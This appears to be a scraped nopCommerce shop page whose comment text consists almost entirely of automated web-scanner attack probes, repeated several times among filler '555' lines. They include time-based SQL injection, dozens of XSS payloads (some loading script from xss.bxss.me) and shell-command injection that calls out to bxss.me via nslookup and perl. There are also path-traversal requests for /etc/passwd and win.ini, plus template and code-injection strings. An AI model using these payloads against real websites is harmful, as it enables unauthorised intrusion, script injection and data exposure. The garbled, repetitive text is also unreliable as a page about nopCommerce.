nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
555
1cnZ4qECzO
response.write(9366552*9883928)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo muafiv$()\ ijvjaa\nz^xyu||a #' &echo muafiv$()\ ijvjaa\nz^xyu||a #|" &echo muafiv$()\ ijvjaa\nz^xyu||a #
'+response.write(9366552*9883928)+'
&echo hriawt$()\ rdrhpx\nz^xyu||a #' &echo hriawt$()\ rdrhpx\nz^xyu||a #|" &echo hriawt$()\ rdrhpx\nz^xyu||a #
"+response.write(9366552*9883928)+"
|echo cecgan$()\ bcigcj\nz^xyu||a #' |echo cecgan$()\ bcigcj\nz^xyu||a #|" |echo cecgan$()\ bcigcj\nz^xyu||a #
(nslookup hitlvefjgbujdc7195.bxss.me||perl -e "gethostbyname('hitlvefjgbujdc7195.bxss.me')")
$(nslookup hitqwgyimshgtb1046.bxss.me||perl -e "gethostbyname('hitqwgyimshgtb1046.bxss.me')")
&nslookup hitpdgjrokdkz336fe.bxss.me&'\"`0&nslookup hitpdgjrokdkz336fe.bxss.me&`'
&(nslookup hitnfmdwgwzou2a2e6.bxss.me||perl -e "gethostbyname('hitnfmdwgwzou2a2e6.bxss.me')")&'\"`0&(nslookup hitnfmdwgwzou2a2e6.bxss.me||perl -e "gethostbyname('hitnfmdwgwzou2a2e6.bxss.me')")&`'
0loj1Uef
|(nslookup hiteohqkhkztl2c326.bxss.me||perl -e "gethostbyname('hiteohqkhkztl2c326.bxss.me')")
`(nslookup hitfwmlgqmner8822b.bxss.me||perl -e "gethostbyname('hitfwmlgqmner8822b.bxss.me')")`
555bcc:074625.678-317779.678.c9f6c.19270.2@bxss.me
../../../../../../../../../../../../../../etc/passwd
;(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")|(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")&(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
to@example.com>bcc:074625.678-317780.678.c9f6c.19270.2@bxss.me
file:///etc/passwd
../555
555<esi:include src="http://bxss.me/rpb.png"/>
${9999201+9999918}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
555&n918937=v927456
http://bxss.me/t/fit.txt?.jpg
/etc/shells
)
c:/windows/win.ini
!(()&&!|*|*|
bxss.me
^(#$!@#$)(()))******
-1 OR 2+887-887-1=0+0+0+1 --
-1 OR 2+488-488-1=0+0+0+1
-1' OR 2+597-597-1=0+0+0+1 --
-1' OR 2+541-541-1=0+0+0+1 or 'KTApbe1p'='
'.gethostbyname(lc('hitth'.'wiqgskef654b3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(86).chr(108).chr(88).'
-1" OR 2+336-336-1=0+0+0+1 --
".gethostbyname(lc("hitht"."vexamwdb3859d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(88).chr(114).chr(90)."
'"()
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
HttP://bxss.me/t/xss.html?%00
";print(md5(31337));$a="
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(97).concat(81).concat(117).concat(90)+(require"socket"Socket.gethostbyname("hitzu"+"chmqwbkpec825.bxss.me.")[3].to_s)+"
555'&&sleep(27*1000)*aaxtkv&&'
${@print(md5(31337))}
555"&&sleep(27*1000)*niuqot&&"
'+'A'.concat(70-3).concat(22*4).concat(113).concat(69).concat(122).concat(82)+(require'socket'Socket.gethostbyname('hitmv'+'vhfhqgfia36c5.bxss.me.')[3].to_s)+'
${@print(md5(31337))}\
555'||sleep(27*1000)*vqlvmk||'
'.print(md5(31337)).'
555"||sleep(27*1000)*lgrmir||"
nopcommerce-new-release
nopcommerce-new-release/.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
if(now()=sysdate(),sleep(15),0)
'"
<!--
555'"()&%<zzz><ScRiPt >8uU3(9556)</ScRiPt>
'"()&%<zzz><ScRiPt >8uU3(9809)</ScRiPt>
5559408320
bfg1843<s1﹥s2ʺs3ʹhjl1843
bfgx9589%C0%BEz1%C0%BCz2a%90bcxhjl9589
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >8uU3(9271)</ScRiPt>
555<WQAYPJ>N8U4S[!+!]</WQAYPJ>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<script>8uU3(9939)</script>
555<ScR<ScRiPt>IpT>8uU3(9250)</sCr<ScRiPt>IpT>
555<ScRiPt >8uU3(9378)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9656></ScRiPt>
-1; waitfor delay '0:0:15' --
555<isindex type=image src=1 onerror=8uU3(9245)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9177'>
555<body onload=8uU3(9550)>
555<img src=//xss.bxss.me/t/dot.gif onload=8uU3(9618)>
555<img src=xyz OnErRor=8uU3(9702)>
555<img/src=">" onerror=alert(9248)>
-1); waitfor delay '0:0:15' --
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%75%55%33%289135%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\8uU3(9631)\u003C/sCripT\u003E
555<ScRiPt>8uU3(9355)</sCripT>
%F6<img zzz onmouseover=8uU3(91771) //%F6>
-1)); waitfor delay '0:0:15' --
555<input autofocus onfocus=8uU3(9207)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(8uU3(9772))}
1 waitfor delay '0:0:15' --
555AciCe<ScRiPt >8uU3(9194)</ScRiPt>
555<W2QORU>2JL1I[!+!]</W2QORU>
555<ifRAme sRc=9460.com></IfRamE>
2N4WlqxF'; waitfor delay '0:0:15' --
555<aS1JGXn x=9208>
555<img sRc='http://attacker-9859/log.php?
555<aEe4PEz<
kCyklO94'); waitfor delay '0:0:15' --
VgSYCb2y')); waitfor delay '0:0:15' --
-5 OR 960=(SELECT 960 FROM PG_SLEEP(15))--
-5) OR 397=(SELECT 397 FROM PG_SLEEP(15))--
-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
3TpOz6Uk' OR 815=(SELECT 815 FROM PG_SLEEP(15))--
jZql5GFR') OR 569=(SELECT 569 FROM PG_SLEEP(15))--
0Tu5izAk')) OR 753=(SELECT 753 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@2Cjqq
555'"()&%<zzz><ScRiPt >t4TV(9517)</ScRiPt>
'"()&%<zzz><ScRiPt >t4TV(9316)</ScRiPt>
response.write(9964580*9839305)
'+response.write(9964580*9839305)+'
"+response.write(9964580*9839305)+"
5559896047
echo clovns$()\ ijhkiw\nz^xyu||a #' &echo clovns$()\ ijhkiw\nz^xyu||a #|" &echo clovns$()\ ijhkiw\nz^xyu||a #
&echo hmwilu$()\ jhwvaa\nz^xyu||a #' &echo hmwilu$()\ jhwvaa\nz^xyu||a #|" &echo hmwilu$()\ jhwvaa\nz^xyu||a #
|echo kvgqaq$()\ zrscsh\nz^xyu||a #' |echo kvgqaq$()\ zrscsh\nz^xyu||a #|" |echo kvgqaq$()\ zrscsh\nz^xyu||a #
(nslookup hitrzxvaazealc4217.bxss.me||perl -e "gethostbyname('hitrzxvaazealc4217.bxss.me')")
fyP8XOFi
$(nslookup hitzywyprrirc7f5cc.bxss.me||perl -e "gethostbyname('hitzywyprrirc7f5cc.bxss.me')")
&nslookup hituediqvtnuh5d74c.bxss.me&'\"`0&nslookup hituediqvtnuh5d74c.bxss.me&`'
&(nslookup hitqqegkrrmdq96662.bxss.me||perl -e "gethostbyname('hitqqegkrrmdq96662.bxss.me')")&'\"`0&(nslookup hitqqegkrrmdq96662.bxss.me||perl -e "gethostbyname('hitqqegkrrmdq96662.bxss.me')")&`'
555bcc:074625.678-322744.678.c9f6c.19270.2@bxss.me
|(nslookup hitluucxtsvnd4ee71.bxss.me||perl -e "gethostbyname('hitluucxtsvnd4ee71.bxss.me')")
to@example.com>bcc:074625.678-322745.678.c9f6c.19270.2@bxss.me
`(nslookup hitazmzbqiijn157bf.bxss.me||perl -e "gethostbyname('hitazmzbqiijn157bf.bxss.me')")`
;(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")|(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")&(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")
${10000375+9999694}
555&n902681=v923559
-1 OR 2+140-140-1=0+0+0+1 --
-1 OR 2+893-893-1=0+0+0+1
-1' OR 2+233-233-1=0+0+0+1 --
-1' OR 2+417-417-1=0+0+0+1 or 'ptxn9Pj8'='
-1" OR 2+668-668-1=0+0+0+1 --
'.gethostbyname(lc('hitun'.'tftpyljd6b33f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(81).chr(107).chr(76).'
555'&&sleep(27*1000)*ephhmp&&'
".gethostbyname(lc("hitwv"."cflgajlhcc626.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(67).chr(108).chr(79)."
555"&&sleep(27*1000)*nfzpdi&&"
555'||sleep(27*1000)*vdelln||'
555"||sleep(27*1000)*lzydjo||"
"+"A".concat(70-3).concat(22*4).concat(108).concat(70).concat(116).concat(87)+(require"socket"Socket.gethostbyname("hital"+"mkhckytu78c9d.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(105).concat(85).concat(98).concat(78)+(require'socket'Socket.gethostbyname('hitbg'+'uudlxorrfb36f.bxss.me.')[3].to_s)+'
555'"()&%<zzz><ScRiPt >1np9(9495)</ScRiPt>
'"()&%<zzz><ScRiPt >1np9(9952)</ScRiPt>
5559084627
bfg9452<s1﹥s2ʺs3ʹhjl9452
bfgx4606%C0%BEz1%C0%BCz2a%90bcxhjl4606
555<ScRiPt >1np9(9375)</ScRiPt>
555<WSXBAQ>VZY7Y[!+!]</WSXBAQ>
555<script>1np9(9316)</script>
555<ScR<ScRiPt>IpT>1np9(9734)</sCr<ScRiPt>IpT>
555<ScRiPt >1np9(9135)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9752></ScRiPt>
555<isindex type=image src=1 onerror=1np9(9959)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9830'>
555<body onload=1np9(9563)>
555<img src=//xss.bxss.me/t/dot.gif onload=1np9(9992)>
555<img src=xyz OnErRor=1np9(9193)>
555<img/src=">" onerror=alert(9271)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%31%6E%70%39%289851%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\1np9(9431)\u003C/sCripT\u003E
555<ScRiPt>1np9(9909)</sCripT>
%F6<img zzz onmouseover=1np9(97871) //%F6>
555<input autofocus onfocus=1np9(9564)>
555}body{zzz:Expre/**/SSion(1np9(9835))}
555bPP8r<ScRiPt >1np9(9540)</ScRiPt>
555<WNBIFE>DTDEI[!+!]</WNBIFE>
555<ifRAme sRc=9857.com></IfRamE>
555<a0TlFxy x=9956>
555<img sRc='http://attacker-9870/log.php?
555<an7D7yq<
zHGhg90W'; waitfor delay '0:0:15' --
iLiEyw3Y'); waitfor delay '0:0:15' --
NQD8whBj')); waitfor delay '0:0:15' --
-5 OR 893=(SELECT 893 FROM PG_SLEEP(15))--
-5) OR 131=(SELECT 131 FROM PG_SLEEP(15))--
-1)) OR 158=(SELECT 158 FROM PG_SLEEP(15))--
AL4U8XK3' OR 743=(SELECT 743 FROM PG_SLEEP(15))--
xsksQCnN') OR 581=(SELECT 581 FROM PG_SLEEP(15))--
Oodael8Y')) OR 370=(SELECT 370 FROM PG_SLEEP(15))--
@@aECeZ
response.write(9793639*9368103)
'+response.write(9793639*9368103)+'
"+response.write(9793639*9368103)+"
echo umwtqu$()\ qrxpsj\nz^xyu||a #' &echo umwtqu$()\ qrxpsj\nz^xyu||a #|" &echo umwtqu$()\ qrxpsj\nz^xyu||a #
&echo bnftfp$()\ ucfwnu\nz^xyu||a #' &echo bnftfp$()\ ucfwnu\nz^xyu||a #|" &echo bnftfp$()\ ucfwnu\nz^xyu||a #
|echo labeos$()\ lqflbd\nz^xyu||a #' |echo labeos$()\ lqflbd\nz^xyu||a #|" |echo labeos$()\ lqflbd\nz^xyu||a #
(nslookup hitoofkegvnklcd730.bxss.me||perl -e "gethostbyname('hitoofkegvnklcd730.bxss.me')")
mBExHoLu
$(nslookup hittoulskmsfu2fbaf.bxss.me||perl -e "gethostbyname('hittoulskmsfu2fbaf.bxss.me')")
&nslookup hitjilkywyxqn1f82f.bxss.me&'\"`0&nslookup hitjilkywyxqn1f82f.bxss.me&`'
&(nslookup hitpkeqzisxhi2258c.bxss.me||perl -e "gethostbyname('hitpkeqzisxhi2258c.bxss.me')")&'\"`0&(nslookup hitpkeqzisxhi2258c.bxss.me||perl -e "gethostbyname('hitpkeqzisxhi2258c.bxss.me')")&`'
|(nslookup hitcfgrtdinfo0a032.bxss.me||perl -e "gethostbyname('hitcfgrtdinfo0a032.bxss.me')")
`(nslookup hituwzcynmskme649e.bxss.me||perl -e "gethostbyname('hituwzcynmskme649e.bxss.me')")`
;(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")|(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")&(nslookup hityvezhxwtci3c791.bxss.me||perl -e "gethostbyname('hityvezhxwtci3c791.bxss.me')")
555bcc:074625.678-328028.678.c9f6c.19270.2@bxss.me
to@example.com>bcc:074625.678-328029.678.c9f6c.19270.2@bxss.me
${9999739+9999746}
555&n977812=v987952
-1 OR 2+946-946-1=0+0+0+1 --
-1 OR 2+530-530-1=0+0+0+1
-1' OR 2+133-133-1=0+0+0+1 --
-1' OR 2+578-578-1=0+0+0+1 or 'LAETwkG0'='
-1" OR 2+353-353-1=0+0+0+1 --
'.gethostbyname(lc('hitsd'.'uisymdds48d5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(66).chr(120).chr(85).'
".gethostbyname(lc("hittz"."rbctelyoa2496.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(79).chr(114).chr(88)."
555'&&sleep(27*1000)*utnfiv&&'
555"&&sleep(27*1000)*goznkr&&"
555'||sleep(27*1000)*wqtzmd||'
555"||sleep(27*1000)*cbfcew||"
"+"A".concat(70-3).concat(22*4).concat(109).concat(75).concat(121).concat(69)+(require"socket"Socket.gethostbyname("hitek"+"anvmetmla305a.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(118).concat(85).concat(106).concat(71)+(require'socket'Socket.gethostbyname('hituf'+'cgsmwwitd5c25.bxss.me.')[3].to_s)+'
555'"()&%<zzz><ScRiPt >4PcJ(9029)</ScRiPt>
'"()&%<zzz><ScRiPt >4PcJ(9755)</ScRiPt>
555'"()&%<zzz><ScRiPt >5f0l(9357)</ScRiPt>
5559398333
'"()&%<zzz><ScRiPt >5f0l(9804)</ScRiPt>
5559894731
bfg2705<s1﹥s2ʺs3ʹhjl2705
bfgx10972%C0%BEz1%C0%BCz2a%90bcxhjl10972
555<ScRiPt >4PcJ(9387)</ScRiPt>
555<WXZCY0>EQRKQ[!+!]</WXZCY0>
555<script>4PcJ(9148)</script>
555<ScR<ScRiPt>IpT>4PcJ(9882)</sCr<ScRiPt>IpT>
555<ScRiPt >4PcJ(9608)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9781></ScRiPt>
555<isindex type=image src=1 onerror=4PcJ(9204)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9705'>
555<body onload=4PcJ(9911)>
555<img src=//xss.bxss.me/t/dot.gif onload=4PcJ(9518)>
555<img src=xyz OnErRor=4PcJ(9785)>
555<img/src=">" onerror=alert(9891)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%34%50%63%4A%289573%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\4PcJ(9972)\u003C/sCripT\u003E
555<ScRiPt>4PcJ(9299)</sCripT>
%F6<img zzz onmouseover=4PcJ(96141) //%F6>
555<input autofocus onfocus=4PcJ(9408)>
555}body{zzz:Expre/**/SSion(4PcJ(9247))}
555wibAq<ScRiPt >4PcJ(9272)</ScRiPt>
QaNrqgIr'; waitfor delay '0:0:15' --
555<WVDVX1>HNODG[!+!]</WVDVX1>
555<ifRAme sRc=9290.com></IfRamE>
555<afxSFRU x=9112>
555<img sRc='http://attacker-9910/log.php?
555<aeKftPi<
7ByJsTel'); waitfor delay '0:0:15' --
BDnhc97O')); waitfor delay '0:0:15' --
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
-5) OR 84=(SELECT 84 FROM PG_SLEEP(15))--
-1)) OR 21=(SELECT 21 FROM PG_SLEEP(15))--
W96om50a' OR 347=(SELECT 347 FROM PG_SLEEP(15))--
giOSmepf') OR 714=(SELECT 714 FROM PG_SLEEP(15))--
RAgJvCbL')) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
@@eWRDJ
This is a sample comment...
555
1cnZ4qECzO
555
response.write(9366552*9883928)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo muafiv$()\ ijvjaa\nz^xyu||a #' &echo muafiv$()\ ijvjaa\nz^xyu||a #|" &echo muafiv$()\ ijvjaa\nz^xyu||a #
'+response.write(9366552*9883928)+'
555
&echo hriawt$()\ rdrhpx\nz^xyu||a #' &echo hriawt$()\ rdrhpx\nz^xyu||a #|" &echo hriawt$()\ rdrhpx\nz^xyu||a #
"+response.write(9366552*9883928)+"
|echo cecgan$()\ bcigcj\nz^xyu||a #' |echo cecgan$()\ bcigcj\nz^xyu||a #|" |echo cecgan$()\ bcigcj\nz^xyu||a #
555
(nslookup hitlvefjgbujdc7195.bxss.me||perl -e "gethostbyname('hitlvefjgbujdc7195.bxss.me')")
$(nslookup hitqwgyimshgtb1046.bxss.me||perl -e "gethostbyname('hitqwgyimshgtb1046.bxss.me')")
555
555
&nslookup hitpdgjrokdkz336fe.bxss.me&'\"`0&nslookup hitpdgjrokdkz336fe.bxss.me&`'
&(nslookup hitnfmdwgwzou2a2e6.bxss.me||perl -e "gethostbyname('hitnfmdwgwzou2a2e6.bxss.me')")&'\"`0&(nslookup hitnfmdwgwzou2a2e6.bxss.me||perl -e "gethostbyname('hitnfmdwgwzou2a2e6.bxss.me')")&`'
0loj1Uef
|(nslookup hiteohqkhkztl2c326.bxss.me||perl -e "gethostbyname('hiteohqkhkztl2c326.bxss.me')")
555
`(nslookup hitfwmlgqmner8822b.bxss.me||perl -e "gethostbyname('hitfwmlgqmner8822b.bxss.me')")`
555
bcc:074625.678-317779.678.c9f6c.19270.2@bxss.me
../../../../../../../../../../../../../../etc/passwd
555
;(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")|(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")&(nslookup hitqdvqogfanj8bc75.bxss.me||perl -e "gethostbyname('hitqdvqogfanj8bc75.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
to@example.com>
bcc:074625.678-317780.678.c9f6c.19270.2@bxss.me
555
555
file:///etc/passwd
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
${9999201+9999918}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
Http://bxss.me/t/fit.txt
555&n918937=v927456
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
)
c:/windows/win.ini
!(()&&!|*|*|
bxss.me
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
-1 OR 2+887-887-1=0+0+0+1 --
555
555
-1 OR 2+488-488-1=0+0+0+1
-1' OR 2+597-597-1=0+0+0+1 --
-1' OR 2+541-541-1=0+0+0+1 or 'KTApbe1p'='
'.gethostbyname(lc('hitth'.'wiqgskef654b3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(86).chr(108).chr(88).'
-1" OR 2+336-336-1=0+0+0+1 --
".gethostbyname(lc("hitht"."vexamwdb3859d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(88).chr(114).chr(90)."
555
'"()
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
HttP://bxss.me/t/xss.html?%00
";print(md5(31337));$a="
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(97).concat(81).concat(117).concat(90)+(require"socket"
Socket.gethostbyname("hitzu"+"chmqwbkpec825.bxss.me.")[3].to_s)+"
555'&&sleep(27*1000)*aaxtkv&&'
${@print(md5(31337))}
555
555"&&sleep(27*1000)*niuqot&&"
'+'A'.concat(70-3).concat(22*4).concat(113).concat(69).concat(122).concat(82)+(require'socket'
Socket.gethostbyname('hitmv'+'vhfhqgfia36c5.bxss.me.')[3].to_s)+'
${@print(md5(31337))}\
555
555
555'||sleep(27*1000)*vqlvmk||'
'.print(md5(31337)).'
555
555"||sleep(27*1000)*lgrmir||"
555
nopcommerce-new-release
555
555
nopcommerce-new-release/.
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
'"
555
<!--
555
555'"()&%<zzz><ScRiPt >8uU3(9556)</ScRiPt>
555
'"()&%<zzz><ScRiPt >8uU3(9809)</ScRiPt>
5559408320
555
555
555
bfg1843<s1﹥s2ʺs3ʹhjl1843
bfgx9589%C0%BEz1%C0%BCz2a%90bcxhjl9589
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
<%={{={@{#{${dfb}}%>
555
555
555
555
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >8uU3(9271)</ScRiPt>
555<WQAYPJ>N8U4S[!+!]</WQAYPJ>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<script>8uU3(9939)</script>
555<ScR<ScRiPt>IpT>8uU3(9250)</sCr<ScRiPt>IpT>
555<ScRiPt
>8uU3(9378)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9656></ScRiPt>
-1; waitfor delay '0:0:15' --
555<isindex type=image src=1 onerror=8uU3(9245)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9177'>
555<body onload=8uU3(9550)>
555<img src=//xss.bxss.me/t/dot.gif onload=8uU3(9618)>
555<img src=xyz OnErRor=8uU3(9702)>
555<img/src=">" onerror=alert(9248)>
-1); waitfor delay '0:0:15' --
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%75%55%33%289135%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\8uU3(9631)\u003C/sCripT\u003E
555<ScRiPt>8uU3(9355)</sCripT>
%F6<img zzz onmouseover=8uU3(91771) //%F6>
-1)); waitfor delay '0:0:15' --
555<input autofocus onfocus=8uU3(9207)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(8uU3(9772))}
1 waitfor delay '0:0:15' --
555AciCe
<ScRiPt >8uU3(9194)</ScRiPt>
555<W2QORU>2JL1I[!+!]</W2QORU>
555<ifRAme sRc=9460.com></IfRamE>
2N4WlqxF'; waitfor delay '0:0:15' --
555<aS1JGXn x=9208>
555<img sRc='http://attacker-9859/log.php?
555<aEe4PEz<
kCyklO94'); waitfor delay '0:0:15' --
555
555
555
555
555
VgSYCb2y')); waitfor delay '0:0:15' --
555
555
555
555
555
555
-5 OR 960=(SELECT 960 FROM PG_SLEEP(15))--
555
555
555
555
555
-5) OR 397=(SELECT 397 FROM PG_SLEEP(15))--
555
555
555
555
555
-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
3TpOz6Uk' OR 815=(SELECT 815 FROM PG_SLEEP(15))--
555
555
555
555
555
555
jZql5GFR') OR 569=(SELECT 569 FROM PG_SLEEP(15))--
555
555
555
555
0Tu5izAk')) OR 753=(SELECT 753 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@2Cjqq
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >t4TV(9517)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >t4TV(9316)</ScRiPt>
response.write(9964580*9839305)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
'+response.write(9964580*9839305)+'
555
"+response.write(9964580*9839305)+"
555
555
555
555
5559896047
555
echo clovns$()\ ijhkiw\nz^xyu||a #' &echo clovns$()\ ijhkiw\nz^xyu||a #|" &echo clovns$()\ ijhkiw\nz^xyu||a #
&echo hmwilu$()\ jhwvaa\nz^xyu||a #' &echo hmwilu$()\ jhwvaa\nz^xyu||a #|" &echo hmwilu$()\ jhwvaa\nz^xyu||a #
555
555
|echo kvgqaq$()\ zrscsh\nz^xyu||a #' |echo kvgqaq$()\ zrscsh\nz^xyu||a #|" |echo kvgqaq$()\ zrscsh\nz^xyu||a #
(nslookup hitrzxvaazealc4217.bxss.me||perl -e "gethostbyname('hitrzxvaazealc4217.bxss.me')")
555
fyP8XOFi
$(nslookup hitzywyprrirc7f5cc.bxss.me||perl -e "gethostbyname('hitzywyprrirc7f5cc.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
555
&nslookup hituediqvtnuh5d74c.bxss.me&'\"`0&nslookup hituediqvtnuh5d74c.bxss.me&`'
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
&(nslookup hitqqegkrrmdq96662.bxss.me||perl -e "gethostbyname('hitqqegkrrmdq96662.bxss.me')")&'\"`0&(nslookup hitqqegkrrmdq96662.bxss.me||perl -e "gethostbyname('hitqqegkrrmdq96662.bxss.me')")&`'
555
bcc:074625.678-322744.678.c9f6c.19270.2@bxss.me
555
|(nslookup hitluucxtsvnd4ee71.bxss.me||perl -e "gethostbyname('hitluucxtsvnd4ee71.bxss.me')")
to@example.com>
bcc:074625.678-322745.678.c9f6c.19270.2@bxss.me
`(nslookup hitazmzbqiijn157bf.bxss.me||perl -e "gethostbyname('hitazmzbqiijn157bf.bxss.me')")`
../555
555
555
;(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")|(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")&(nslookup hiteyjzubpite56890.bxss.me||perl -e "gethostbyname('hiteyjzubpite56890.bxss.me')")
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
555
555
${10000375+9999694}
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
Http://bxss.me/t/fit.txt
555
555&n902681=v923559
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
555
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
555
555
)
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
'"()
-1 OR 2+140-140-1=0+0+0+1 --
555
-1 OR 2+893-893-1=0+0+0+1
-1' OR 2+233-233-1=0+0+0+1 --
-1' OR 2+417-417-1=0+0+0+1 or 'ptxn9Pj8'='
-1" OR 2+668-668-1=0+0+0+1 --
555
'.gethostbyname(lc('hitun'.'tftpyljd6b33f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(81).chr(107).chr(76).'
555'&&sleep(27*1000)*ephhmp&&'
